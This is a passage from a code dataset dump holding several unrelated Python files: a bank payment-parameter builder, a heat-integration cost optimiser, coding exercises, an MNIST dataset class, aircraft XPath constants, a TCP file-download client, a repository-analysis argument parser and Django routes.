orders[0].name, # 定单号\n # 'PAYMENT': orders[0].amount_total, # 付款金额\n # 'CURCODE': '01', # 币种\n # 'TXCODE': '520100', # 交易码\n # 'MAC': '', # MAC校验域\n # 'TYPE': '1', # 接口类型\n # 'PUB': '', # 公钥后30位\n # 'GATEWAY': 'UnionPay', # 网关类型\n\n # o = OrderedDict()\n # o['MERCHANTID'] = company.long_mch_id\n # o['POSID'] = company.long_counter_id\n # o['BRANCHID'] = company.long_branch_code\n # o['ORDERID'] = orders[0].name\n # o['PAYMENT'] = amount_total\n # o['CURCODE'] = '01'\n # o['TXCODE'] = '520100'\n # o['REMARK1'] = 'remark1'\n # o['REMARK2'] = 'remark2'\n # o['TYPE'] = '1'\n # o['PUB'] = pub\n # o['GATEWAY'] = 'test'\n # o['CLIENTIP'] = '127.0.0.1'\n # o['REGINFO'] = 'cs'\n # o['PROINFO'] = 'cs'\n # o['REFERER'] = '121.201.68.100'\n # o['THIRDAPPINFO'] = 'comccbpay' + company.long_mch_id + 'glekePay'\n #\n # o2 = OrderedDict()\n # o2['MERCHANTID'] = company.long_mch_id\n # o2['POSID'] = company.long_counter_id\n # o2['BRANCHID'] = company.long_branch_code\n # o2['ORDERID'] = orders[0].name\n # o2['PAYMENT'] = amount_total\n # o2['CURCODE'] = '01'\n # o2['TXCODE'] = '520100'\n # o2['REMARK1'] = 'remark1'\n # o2['REMARK2'] = 'remark2'\n # o2['TYPE'] = '1'\n # o2['GATEWAY'] = 'test'\n # o2['CLIENTIP'] = '127.0.0.1'\n # o2['REGINFO'] = 'cs'\n # o2['PROINFO'] = 'cs'\n # o2['REFERER'] = '121.201.68.100'\n # o2['THIRDAPPINFO'] = 'comccbpay' + company.long_mch_id + 'glekePay'\n #\n # parameter1 = urllib.urlencode(o) # 加密用\n # parameter2 = urllib.urlencode(o2) # 请求用\n\n\n parameter1 = \"MERCHANTID=\" + company.long_mch_id + \"&\" + \\\n \"POSID=\" + company.long_counter_id + \"&\" + \\\n \"BRANCHID=\" + company.long_branch_code + \"&\" + \\\n \"ORDERID=\" + orders[0].name + \"&\" + \\\n \"PAYMENT=\" + str(amount_total) + \"&\" + \\\n \"CURCODE=\" + '01' + \"&\" + \\\n \"TXCODE=\" + '520100' + \"&\" + \\\n \"REMARK1=\" + 'remark1' + \"&\" + \\\n \"REMARK2=\" + 'remark2' + \"&\" + \\\n \"TYPE=\" + '1' + \"&\" + \\\n \"PUB=\" + pub + \"&\" + \\\n \"GATEWAY=\" + 'test' + '&' + \\\n \"CLIENTIP=\" + '127.0.0.1' + '&' + \\\n \"REGINFO=\" + reginfo + '&' + \\\n \"PROINFO=\" + proinfo + '&' + \\\n \"REFERER=\" + '121.201.68.100' + '&' + \\\n \"THIRDAPPINFO=\" + 'comccbpay' + company.long_mch_id + 'glekePay'\n\n parameter2 = \"MERCHANTID=\" + company.long_mch_id + \"&\" + \\\n \"POSID=\" + company.long_counter_id + \"&\" + \\\n \"BRANCHID=\" + company.long_branch_code + \"&\" + \\\n \"ORDERID=\" + orders[0].name + \"&\" + \\\n \"PAYMENT=\" + str(amount_total) + \"&\" + \\\n \"CURCODE=\" + '01' + \"&\" + \\\n \"TXCODE=\" + '520100' + \"&\" + \\\n \"REMARK1=\" + 'remark1' + \"&\" + \\\n \"REMARK2=\" + 'remark2' + \"&\" + \\\n \"TYPE=\" + '1' + \"&\" + \\\n \"GATEWAY=\" + 'test' + '&' + \\\n \"CLIENTIP=\" + '127.0.0.1' + '&' + \\\n \"REGINFO=\" + reginfo + '&' + \\\n \"PROINFO=\" + proinfo + '&' + \\\n \"REFERER=\" + '121.201.68.100' + '&' + \\\n \"THIRDAPPINFO=\" + 'comccbpay' + company.long_mch_id + 'glekePay'\n\n mac = md5_encode(parameter1) # 参数生成MAC\n\n parameter = parameter2 + \"&\" + \"MAC=\" + mac # 将生成的MAC拼接到原参数后面\n\n return parameter\n\n","sub_path":"shango_app/models/long_pay_record.py","file_name":"long_pay_record.py","file_ext":"py","file_size_in_byte":6327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"498272979","text":"import sys\nfrom problem_table import stream,problem_table\nfrom scipy import optimize\nimport matplotlib.pyplot as plt\nplt.style.use('seaborn')\nimport numpy as np\n\ndHvap = 2250.76\nCps = 1.895\nCpw = 4.20\nTf = 398-273\nTsat = 378-273\nTstart = 303-273\n\nstreams = []\nunstreamed_values = []\nprint(\"Inputs: \")\nwith open(sys.argv[1],'r') as file:\n\tfor line in file:\n\t\tvals = line.split(',')\n\t\tvals2 = [float(val) for val in vals]\n\t\tunstreamed_values.append(vals2)\n\ncapitals = []\nenergies = []\nsavings = []\n\n\ndef objective(dTmin):\n\tstreams = []\n\tfor val_set in unstreamed_values:\n\t\tnew_stream = stream(val_set[0],val_set[1],val_set[2],delta_T=dTmin)\n\t\tstreams.append(new_stream)\n\tpt = problem_table(streams) \n\tQc,Qh,pinch,deltaHs,intervalTemps = pt.calc_vals(gcc=True)\n\tenergy_cost = 300 * 3.6 * 10* (Qh+2832) #energy cost in $ 2832 is the KW from the unintegrated reboiler that must be considered\n\tcapital_cost = 12.5*10**6 / (dTmin**.05) #capital cost in $\n\tsaved_cost = saved(Qc,Qh,deltaHs,intervalTemps)\n\ttotal_cost = energy_cost + capital_cost - saved_cost\n\t#print(\"dtmin: {} Total cost: {} Saved Cost: {} Energy Cost: {}\".format(dTmin,total_cost,saved_cost,energy_cost))\n\tcapitals.append(capital_cost)\n\tenergies.append(energy_cost)\n\tsavings.append(saved_cost)\n\n\treturn total_cost\n\n\ndef steam_raising(Qc,Qh,deltaHs,intervalTemps):\n\n\tdef Hwater(T,H_start): #calculates the enthalpy of the water at a specific pt using eqs from paper\n\t\treturn H_start - Mw * Cpw * (T-Tstart) \n\n\tdef Hstart(Hwsat,Mw): #calculates starting enthalpy based on given vals\n\t\treturn Mw * Cpw * (Tsat-Tstart) + Hwsat\n\n\tdef Mw_calc(Hwsat):\n\t\treturn Hwsat / dHvap * (1-Cps * (Tf-Tsat) / (dHvap + Cps * (Tf-Tsat)))\n\n\tdef Hsteam(T,Mw):\n\t\treturn Mw * Cps * (Tf - T) \n\n\ttHpoints = []\n\ttHpoints.append((intervalTemps[0][0],Qh))\n\tcascade = Qh*10\n\tQc *= 10\n\tdeltaHs = [i*10 for i in deltaHs]\n\tfor i in range(len(intervalTemps)):\n\t\tcascade += deltaHs[i]\n\t\ttHpoints.append((intervalTemps[i][1],cascade))\n\n\n\ttopPt = []\n\tbotPt = []\n\tfor i in range(len(tHpoints)):\n\t\tif Tf >= tHpoints[i][0]:\n\t\t\ttopPt = i\n\t\t\tbreak\n\tfor i in range(len(tHpoints)-1,0,-1):\n\t\tif tHpoints[i][0] >= Tstart:\n\t\t\tbotPt = i\n\t\t\tbreak\n\n\trelevant_tH = tHpoints[topPt:botPt]\n\n\n\n\n\ttemps = [i[0] for i in tHpoints]\n\tenthalpies = [i[1] for i in tHpoints]\n\n\n\t# Hssat_init = Qc\n\t# Mw = 1 / Cps * Hssat_init / (Tf-Tsat)\n\t# Hwsat = dHvap * Mw + Hssat_init\n\tHwsat = Qc\n\tMw = Mw_calc(Hwsat)\n\t# print(\"hssat_init\",Hssat_init)\n\t# print(\"init of its\",Hwsat)\n\n\n\n\n\tdef gcc_crossed(Hwsat,Mw):\n\t\tH_start = Hstart(Hwsat,Mw)\n\t\tfor pt in relevant_tH:\n\t\t\tif Hwater(pt[0],H_start) > pt[1]:\n\t\t\t\treturn True\n\t\treturn False\n\n\n\twhile gcc_crossed(Hwsat,Mw):\n\t\tHwsat -= 1\n\t\tMw = Mw_calc(Hwsat)\n\t \n\tMw = Mw_calc(Hwsat)\n\tH_sr = Cpw * Mw * (Tsat-Tstart) + dHvap * Mw + Cps * Mw * (Tsat-Tstart)\n\n\tTpoints = np.linspace(Tstart,Tsat,100)\n\tH_start = Hstart(Hwsat,Mw_calc(Hwsat))\n\tHpoints = Hwater(Tpoints,H_start)\n\n\tTpointsSteam = np.linspace(Tsat,Tf,100)\n\tHpointsSteam = Hsteam(TpointsSteam,Mw)\n\n\tHtransition = np.linspace(Hpoints[-1],HpointsSteam[0],100)\n\tTtransition = [Tsat for i in range(100)]\n\n\t# plt.style('ggplot')\n\t# plt.annotate('Hwsat',xy=(Hwsat,105),xytext=(Hwsat+200,110), arrowprops=dict(facecolor='black',arrowstyle='-|>'))\n\t# plt.annotate('Hssat',xy=(HpointsSteam[0],105),xytext=(HpointsSteam[0],60), arrowprops=dict(facecolor='black',arrowstyle='-|>'))\n\t# plt.annotate('Hstart',xy=(H_start,30),xytext=(H_start-400,35), arrowprops=dict(facecolor='black',arrowstyle='-|>'))\n\n\n\t# plt.plot(enthalpies,temps)\n\t# plt.plot(Hpoints,Tpoints,'r')\n\t# plt.plot(HpointsSteam,TpointsSteam,'r')\n\t# plt.plot(Htransition,Ttransition,'r')\n\t# plt.xlabel(\"Enthalpy (kW)\")\n\t# plt.ylabel(\"Temperature (Celsius)\")\n\t# plt.show()\n\n\t# raise ValueError(\"Fuck my life\")\n\n\n\n\treturn H_sr,Mw\n\ndef saved(Qc,Qh,deltaHs,intervalTemps):\n\tH_sr,Mw = steam_raising(Qc,Qh,deltaHs,intervalTemps)\n\t#print(\"H_sr\",H_sr,\"Qc\",Qc*10,\"Qh\",Qh)\n\tWork_carnot = 21.141 * (1/44.01) * Mw / 1000 #j / mol * mol / kg * kg/s * kj / j\n\treturn (H_sr + Work_carnot) * 300 * 3.6\n\n\n\n\n\ndTmin_array = np.linspace(3,40,1000)\ncosts = []\nfor i in dTmin_array:\n\tcosts.append(objective(i))\n\nprint(\"Min Delta T: \",dTmin_array[costs.index(min(costs))], \"Min Cost: \", min(costs))\n\n\nplt.plot(dTmin_array,costs,label='total costs')\nplt.xlabel('Delta T Min (K)')\nplt.ylabel('Total Cost (* 10 mil $)')\nplt.title('Effect of Delta T Min on total cost',y=1.08)\nplt.savefig('overall_total_cost_with_steam_raising_total_only.jpg')\nplt.show()\n\n\n\n\n","sub_path":"problem_table/problem_table/overall_minimization.py","file_name":"overall_minimization.py","file_ext":"py","file_size_in_byte":4471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"519838935","text":"\"\"\"\n给定两个没有重复元素的数组 nums1 和 nums2 ,其中nums1 是 nums2 的子集。找到 nums1 中每个元素在 nums2 中的下一个比其大的值。\n\nnums1 中数字 x 的下一个更大元素是指 x 在 nums2 中对应位置的右边的第一个比 x 大的元素。如果不存在,对应位置输出-1。\n\n示例 1:\n\n输入: nums1 = [4,1,2], nums2 = [1,3,4,2].\n输出: [-1,3,-1]\n解释:\n 对于num1中的数字4,你无法在第二个数组中找到下一个更大的数字,因此输出 -1。\n 对于num1中的数字1,第二个数组中数字1右边的下一个较大数字是 3。\n 对于num1中的数字2,第二个数组中没有下一个更大的数字,因此输出 -1。\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/next-greater-element-i\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\nclass Solution:\n def nextGreaterElement(self, nums1: List[int], nums2: List[int]) -> List[int]:\n L = []\n for i in nums1:\n index_i = nums2.index(i)\n if index_i < len(nums2)-1:\n if max(nums2[index_i+1:]) < i:\n L.append(-1)\n else:\n while nums2[index_i+1]\nalpha bravo charlie delta\n10 20 30 40\n<출력>\n{'alpha': 10, 'bravo': 20}\n\n<입력 예>\nalpha bravo charlie delta echo foxtrot golf\n30 40 50 60 70 80 90\n<출력>\n{'bravo': 40, 'charlie': 50, 'echo': 70, 'foxtrot': 80, 'golf': 90}\n'''\n\nkeys = input().split()\nvalues = map(int, input().split())\n \nx = dict(zip(keys, values))\n\nx = {key: value for key, value in x.items() if key != 'delta'}\nx = {key: value for key, value in x.items() if value != 30}\n\nprint(x)\n","sub_path":"9_judge_dict_del.py","file_name":"9_judge_dict_del.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"628494515","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 16 17:31:55 2017\nПринадле��ит ли точка квадрату - 1\n@author: doug\n\"\"\"\nimport math\n\n\ndef IsPointInSquare(x, y):\n \"\"\" is point in square \"\"\"\n x1 = abs(x)\n y1 = abs(y)\n return (abs(x) <= 1) and (abs(y) <= 1)\n\nxIn = float(input())\nyIn = float(input())\nif (IsPointInSquare(xIn, yIn)):\n print(\"YES\")\nelse:\n print(\"NO\")\n","sub_path":"Week4-Функции и рекурсия/Принадлежит_ли_точка_квадрату1_IsPointInSquare.py","file_name":"Принадлежит_ли_точка_квадрату1_IsPointInSquare.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"615815936","text":"import cv2\nimport torchvision\nimport numpy as np\n\ncv2.setNumThreads(0)\ncv2.ocl.setUseOpenCL(False)\n\n\nclass MNISTSearchDataset(torchvision.datasets.MNIST):\n def __init__(self, root=\"~/data/mnist\", train=True, download=True, transform=None):\n super().__init__(root=root, train=train, download=download, transform=transform)\n\n def __getitem__(self, index):\n image, label = self.data[index], self.targets[index]\n\n if self.transform is not None:\n im_3d = np.repeat(image[:, :, np.newaxis], 3, 2)\n transformed = self.transform(image=im_3d.numpy())\n image = transformed[\"image\"]\n\n return image, label\n","sub_path":"examples/MNIST/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"146316998","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCopyright 2017 D. de Vries\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\nThis file contains all the XPaths and utility string constants used by the dAEDalus disciplines.\n\"\"\"\nfrom __future__ import absolute_import, division, print_function\n\nsigma_names = ['sigma_fs', 'sigma_rs', 'sigma_ts', 'sigma_bs']\n\n\"\"\" CPACS \"\"\"\nx_vehicles = '/cpacs/vehicles'\nx_model = x_vehicles + '/aircraft/model[@uID=\"model\"]'\nx_ref = '/'.join([x_model, 'reference'])\nx_wing = '/'.join([x_model, 'wings/wing[@symmetry=\"x-z-plane\"][@uID=\"wing\"]'])\nx_sec = '/'.join([x_wing, 'sections/section[@uID=\"sec_%d\"]'])\nx_elem = '/'.join([x_sec, 'elements/element[@uID=\"elem_%d\"]'])\nx_mbd = '/'.join([x_model, 'analyses/massBreakdown'])\nx_global = '/'.join([x_model, 'global'])\nx_perf = '/'.join([x_global, 'performanceTargets'])\n\nx_ref_area = '/'.join([x_ref, 'area'])\nx_ref_length = '/'.join([x_ref, 'length'])\nx_compseg = '/'.join([x_wing, 'componentSegments/componentSegment[@uID=\"compSeg_%d\"]'])\nx_struct = '/'.join([x_compseg, 'structure'])\nx_sparposs = '/'.join([x_struct, 'spars/sparPositions'])\nx_fs_r_xsi = '/'.join([x_sparposs, 'sparPosition[@uID=\"fs_%d_r\"]/xsi'])\nx_fs_t_xsi = '/'.join([x_sparposs, 'sparPosition[@uID=\"fs_%d_t\"]/xsi'])\nx_rs_r_xsi = '/'.join([x_sparposs, 'sparPosition[@uID=\"rs_%d_r\"]/xsi'])\nx_rs_t_xsi = '/'.join([x_sparposs, 'sparPosition[@uID=\"rs_%d_t\"]/xsi'])\nx_sparsegs = '/'.join([x_struct, 'spars/sparSegments'])\nx_fs_web_t = '/'.join([x_sparsegs, 'sparSegment[@uID=\"fs_%d\"]/sparCrossSection/web1/material/thickness'])\nx_fs_lowerCap_t = '/'.join([x_sparsegs, 'sparSegment[@uID=\"fs_%d\"]/sparCrossSection/lowerCap/material/thickness'])\nx_fs_upperCap_t = '/'.join([x_sparsegs, 'sparSegment[@uID=\"fs_%d\"]/sparCrossSection/upperCap/material/thickness'])\nx_rs_web_t = '/'.join([x_sparsegs, 'sparSegment[@uID=\"rs_%d\"]/sparCrossSection/web1/material/thickness'])\nx_rs_lowerCap_t = '/'.join([x_sparsegs, 'sparSegment[@uID=\"rs_%d\"]/sparCrossSection/lowerCap/material/thickness'])\nx_rs_upperCap_t = '/'.join([x_sparsegs, 'sparSegment[@uID=\"rs_%d\"]/sparCrossSection/upperCap/material/thickness'])\nx_mSkins = '/'.join([x_model, 'analyses/massBreakdown/mOEM/mEM/mStructure/mWingsStructure/'\n 'mWingStructure/mComponentSegment[%d]/mWingBox'])\n\n\"\"\" Wing optimization problem \"\"\"\nx_opt = '/cpacs/toolspecific/wingOptimizationProblem'\nx_planform = '/'.join([x_opt, 'planform'])\nx_structure = '/'.join([x_opt, 'structure'])\nx_reference = '/'.join([x_opt, 'reference'])\n\nx_const = '/'.join([x_opt, 'constants'])\nx_con = '/'.join([x_opt, 'constraints'])\nx_obj = '/'.join([x_opt, 'objectives'])\n\nx_c = '/'.join([x_planform, 'c'])\nx_tc = '/'.join([x_planform, 'tc'])\nx_epsilon = '/'.join([x_planform, 'epsilon'])\nx_b = '/'.join([x_planform, 'b'])\nx_Lambda = '/'.join([x_planform, 'Lambda'])\nx_Gamma = '/'.join([x_planform, 'Gamma'])\nx_incidence = '/'.join([x_planform, 'incidence'])\n\nx_xsi_fs = '/'.join([x_structure, 'xsi_fs'])\nx_xsi_rs = '/'.join([x_structure, 'xsi_rs'])\nx_t_fs = '/'.join([x_structure, 't_fs'])\nx_t_rs = '/'.join([x_structure, 't_rs'])\nx_t_ts = '/'.join([x_structure, 't_ts'])\nx_t_bs = '/'.join([x_structure, 't_bs'])\nx_t_skin = '/'.join([x_structure, 't_skin'])\n\nx_m_fixed = '/'.join([x_reference, 'm_fixed'])\nx_m_payload = '/'.join([x_reference, 'm_payload'])\nx_f_m_sys = '/'.join([x_reference, 'f_m_sys'])\nx_f_m_wings = '/'.join([x_reference, 'f_m_wings'])\nx_m_mlw = '/'.join([x_reference, 'm_MLW'])\nx_m_mtow = '/'.join([x_reference, 'm_MTOW'])\n\nx_SFC = '/'.join([x_reference, 'SFC'])\nx_m_fuel_res = '/'.join([x_reference, 'm_fuel_res'])\nx_CDfus = '/'.join([x_reference, 'C_D_fus'])\nx_CDother = '/'.join([x_reference, 'C_D_other'])\nx_R = '/'.join([x_reference, 'R'])\n\nx_rho_skin = '/'.join([x_reference, 'rho_skin'])\nx_sigma_yield = '/'.join([x_reference, 'sigma_yield'])\nx_WS_init = '/'.join([x_reference, 'WS_init'])\nx_CL_buffet = '/'.join([x_reference, 'C_L_buffet'])\nx_m_wing_init = '/'.join([x_reference, 'm_wing_init'])\nx_m_fuel_init = '/'.join([x_reference, 'm_fuel_init'])\n\nx_con_sigmas = ['/'.join([x_con, 'con_' + sigma]) for sigma in sigma_names]\nx_con_WS = '/'.join([x_con, 'con_WS'])\nx_con_buffet = '/'.join([x_con, 'con_buffet'])\n\nx_obj_m_fuel = '/'.join([x_obj, 'obj_m_fuel'])\nx_obj_m_wing = '/'.join([x_obj, 'obj_m_wing'])\n\n\n\"\"\" dAEDalus \"\"\"\nx_dAE = '/cpacs/toolspecific/dAEDalus'\nx_m_wing = '/'.join([x_dAE, 'm_wing'])\n\nx_loadcases = '/'.join([x_dAE, 'loadCases'])\nx_loadcase = '/'.join([x_loadcases, 'loadCase[%d]'])\n\nx_M = '/'.join([x_loadcase, 'M'])\nx_H = '/'.join([x_loadcase, 'H'])\nx_n = '/'.join([x_loadcase, 'n'])\nx_CL = '/'.join([x_loadcase, 'C_L'])\nx_CDf = '/'.join([x_loadcase, 'C_D_f'])\nx_CDi = '/'.join([x_loadcase, 'C_D_i'])\n\nx_grid_initial = ['/'.join([x_loadcase, 'initial_grid/' + component]) for component in ['x', 'y', 'z']]\nx_grid = ['/'.join([x_loadcase, 'deflected_grid/' + component]) for component in ['x', 'y', 'z']]\nx_grid_guess = ['/'.join([x_loadcase, 'guess_grid/' + component]) for component in ['x', 'y', 'z']]\n\nx_sigmas_in = ['/'.join([x_loadcase, sigma]) for sigma in sigma_names]\nx_load_collector = '/'.join([x_dAE, 'load_collector'])\nx_sigmas_out = ['/'.join([x_load_collector, sigma]) for sigma in sigma_names]\n\nx_y_norm = '/'.join([x_loadcase, 'y_norm'])\nx_l_norm = '/'.join([x_loadcase, 'l_norm'])\n\nx_geom = '/'.join([x_loadcase, 'geometric_model'])\nx_stru = '/'.join([x_loadcase, 'structural_model'])\nx_aero = '/'.join([x_loadcase, 'aerodynamic_model'])\n\nx_mle = '/'.join([x_loadcase, 'matlab_engine'])\nx_ml_timeout = '/'.join([x_mle, 'timeout'])\nx_ml_id = '/'.join([x_mle, 'id'])\nx_ml_timestamp = '/'.join([x_mle, 'timestamp'])\n\n\"\"\" FWE \"\"\"\nx_fwe = '/cpacs/toolspecific/fuel_weight_estimator'\n\nx_CD = '/'.join([x_fwe, 'C_D'])\nx_LD = '/'.join([x_fwe, 'L_D'])\nx_m_fuel = '/'.join([x_fwe, 'm_fuel'])\nx_fwe_CL = '/'.join([x_fwe, 'C_L'])\n","sub_path":"openlego/test_suite/test_examples/wing_opt/kb/disciplines/xpaths.py","file_name":"xpaths.py","file_ext":"py","file_size_in_byte":6347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"584698086","text":"\nimport math\nimport statistics\n\n\ndef stdev(values):\n \"\"\"\n Returns the population (or \"unbiased\") standard deviation\n for the given values.\n \"\"\"\n # This replaced numpy.std(), which calculates the population\n # standard deviation, and not the sample standard deviation.\n # statistics.stdev calculates the sample sample deviation, but in\n # order to get the same value as previous calculated with have to\n # use the square root of statistics.pvariance.\n if (len(values) == 0):\n # mirror numpy.std functionality of returning nan when input is empty\n return float('nan')\n # else standard dev is the square root of the variance\n return math.sqrt(statistics.pvariance(values))\n\n\ndef get_histogram(values, num_bins=10):\n \"\"\"\n Get a histogram of a list of numeric values.\n Returns array of \"bin\" dicts with keys `count`, `max`, and `min`.\n \"\"\"\n\n if (num_bins <= 0):\n raise ValueError('num_bins must be greater than 0')\n\n # convert values to floats\n values = [float(v) for v in values]\n\n # When input array is empty, can't determine range so use 0.0 - 1.0\n # as numpy.histogram does\n if (len(values) == 0):\n mn, mx = 0.0, 1.0\n else:\n # find the min and max\n mn, mx = min(values), max(values)\n\n # Adjust mn and mx if they are equivalent (ie, the input array\n # values are all the same number)\n if (mn == mx):\n mn -= 0.5\n mx += 0.5\n\n bin_width = (mx - mn) / num_bins\n\n # initialize the bins\n bins = [{\n 'min': mn + bin_width * i,\n 'max': mn + bin_width * (i + 1),\n 'count': 0\n } for i in range(0, num_bins)]\n\n # bin the values\n for val in values:\n for b in bins:\n if (val >= b['min'] and val < b['max']):\n b['count'] += 1\n # correction for when a value == the max value\n if (val == mx and b['max'] == mx):\n b['count'] += 1\n\n return bins\n","sub_path":"api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"171571030","text":"import socket\n\ndef main():\n # 创建套接字\n s_download = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n # 获取dest_ip dest_port\n #dest_ip = input(\"请输入目标ip:\")\n dest_ip = \"10.0.0.8\"\n dest_port = int(input(\"请输入目标端口:\"))\n dest_addr = (dest_ip,dest_port)\n # 链接服务器\n s_download.connect(dest_addr)\n # 获取下载文件的名字\n file_name = input(\"请输入要下载的文件名:\")\n # 将文件名发送到服务器\n s_download.send(file_name.encode(\"gbk\"))\n # 接受文件中的数据\n file_recv = s_download.recv(1024*1024)\n # 保存接受到的数据到文件中\n if file_recv:\n with open(\"download_\"+file_name,\"w\") as f:\n f.write(file_recv.decode(\"gbk\"))\n # 关闭套接字\n s_download.close()\n \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"socket/ubuntu_py/socket-tcp/04-文件下载器-client.py","file_name":"04-文件下载器-client.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"375400754","text":"import os\nimport argparse\nfrom typing import Sequence\nfrom urllib.parse import urlparse\n\n\nclass Configuration:\n def __init__(\n self,\n repositoryUrl: str,\n batchMonths: int,\n outputPath: str,\n sentiStrengthPath: str,\n maxDistance: int,\n pat: str,\n googleKey: str,\n startDate: str\n ):\n self.repositoryUrl = repositoryUrl\n self.batchMonths = batchMonths\n self.outputPath = outputPath\n self.sentiStrengthPath = sentiStrengthPath\n self.maxDistance = maxDistance\n self.pat = pat\n self.googleKey = googleKey\n self.startDate = startDate\n\n # parse repo name into owner and project name\n split = self.repositoryUrl.split(\"/\")\n self.repositoryOwner = split[3]\n self.repositoryName = split[4]\n\n # build repo path\n self.repositoryPath = os.path.join(self.outputPath, split[3], split[4])\n\n # build results path\n self.resultsPath = os.path.join(self.repositoryPath, \"results\")\n\n # build metrics path\n self.metricsPath = os.path.join(self.resultsPath, \"metrics\")\n\n\ndef parseAliasArgs(args: Sequence[str]):\n\n parser = argparse.ArgumentParser(\n description=\"Extract commit author aliases from GitHub repositories.\",\n epilog=\"Check README file for more information on running this tool.\",\n )\n\n parser.add_argument(\n \"-p\",\n \"--pat\",\n help=\"GitHub PAT (personal access token) used for querying the GitHub API\",\n required=True,\n )\n\n parser.add_argument(\n \"-r\",\n \"--repositoryUrl\",\n help=\"GitHub repository URL that you want to analyse\",\n required=True,\n )\n\n parser.add_argument(\n \"-d\",\n \"--maxDistance\",\n help=\"\"\"string distance metric\n https://github.com/luozhouyang/python-string-similarity#metric-longest-common-subsequence\n \"\"\",\n type=float,\n required=True,\n )\n\n parser.add_argument(\n \"-o\",\n \"--outputPath\",\n help=\"local directory path for analysis output\",\n required=True,\n )\n\n parser.add_argument(\n \"-sd\",\n \"--startDate\",\n help=\"start date of project life\",\n required=False,\n )\n\n args = parser.parse_args()\n config = Configuration(\n args.repositoryUrl, 0, args.outputPath, \"\", args.maxDistance, args.pat, \"\"\n )\n\n return config\n\n\ndef parseDevNetworkArgs(args: Sequence[str]):\n\n parser = argparse.ArgumentParser(\n description=\"Perform network and statistical analysis on GitHub repositories.\",\n epilog=\"Check README file for more information on running this tool.\",\n )\n\n parser.add_argument(\n \"-p\",\n \"--pat\",\n help=\"GitHub PAT (personal access token) used for querying the GitHub API\",\n required=True,\n )\n\n parser.add_argument(\n \"-g\",\n \"--googleKey\",\n help=\"Google Cloud API Key used for authentication with the Perspective API\",\n required=False,\n )\n\n parser.add_argument(\n \"-r\",\n \"--repositoryUrl\",\n help=\"GitHub repository URL that you want to analyse\",\n required=True,\n )\n\n parser.add_argument(\n \"-m\",\n \"--batchMonths\",\n help=\"Number of months to analyze per batch. Default=9999\",\n type=float,\n default=9999,\n )\n\n parser.add_argument(\n \"-s\",\n \"--sentiStrengthPath\",\n help=\"local directory path to the SentiStregth tool\",\n required=True,\n )\n\n parser.add_argument(\n \"-o\",\n \"--outputPath\",\n help=\"Local directory path for analysis output\",\n required=True,\n )\n\n parser.add_argument(\n \"-sd\",\n \"--startDate\",\n help=\"Start date of project life\",\n required=False,\n )\n\n args = parser.parse_args(args)\n\n #validation of the input inserted by the user\n if args.repositoryUrl is None:\n raise ValueError(\"The repository URL is needed\")\n\n if \"github\" not in urlparse(args.repositoryUrl).netloc:\n raise ValueError(\"The repository URL inserted is not valid or malformed\")\n\n if args.pat is None:\n raise ValueError(\"A valid Github PAT is needed to clone the repository\")\n\n senti_files_found = False\n\n if args.sentiStrengthPath is None:\n raise ValueError(\"A valid senti folder is needed to perform sentiment analysis on the repository\")\n\n try:\n with os.scandir(args.sentiStrengthPath) as entries:\n for entry in entries:\n if \"SentiStrength\" in entry.name:\n senti_files_found = True\n break\n if not senti_files_found:\n raise ValueError(\"The senti folder provided does not contains the needed files. Check the README for more \"\n \"details\")\n except FileNotFoundError:\n raise ValueError(\"A malformed or invalid senti folder is provided\")\n\n if args.outputPath is None:\n raise ValueError(\"A valid output folder is needed to save the analysis of the repository\")\n\n try:\n with os.scandir(args.outputPath) as entries:\n pass\n except FileNotFoundError:\n raise ValueError(\"The output folder provided is not avaiable in the file system or have restricted access\")\n\n config = Configuration(\n args.repositoryUrl,\n args.batchMonths,\n args.outputPath,\n args.sentiStrengthPath,\n 0,\n args.pat,\n args.googleKey,\n args.startDate\n )\n\n return config\n","sub_path":"configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":5565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"98319577","text":"from django.urls import include, path\nfrom rest_framework.routers import SimpleRouter\n\nfrom .views import PollViewSet, QuestionViewSet, ChoiceViewSet, \\\n UserPollViewSet, UserTestViewSet\n\nrouter = SimpleRouter()\n\nrouter.register('polls', PollViewSet, basename='poll')\nrouter.register(\n r'polls/(?P\\d+)/questions',\n QuestionViewSet,\n basename='question'\n)\nrouter.register(\n r'polls/(?P\\d+)/questions/(?P\\d+)/choices',\n ChoiceViewSet,\n basename='choice'\n)\n# Для пользователей #\nrouter.register('users/polls', UserPollViewSet, basename='users_poll')\nrouter.register('users/tests', UserTestViewSet, basename='users_test')\n\nurlpatterns = [\n path('', 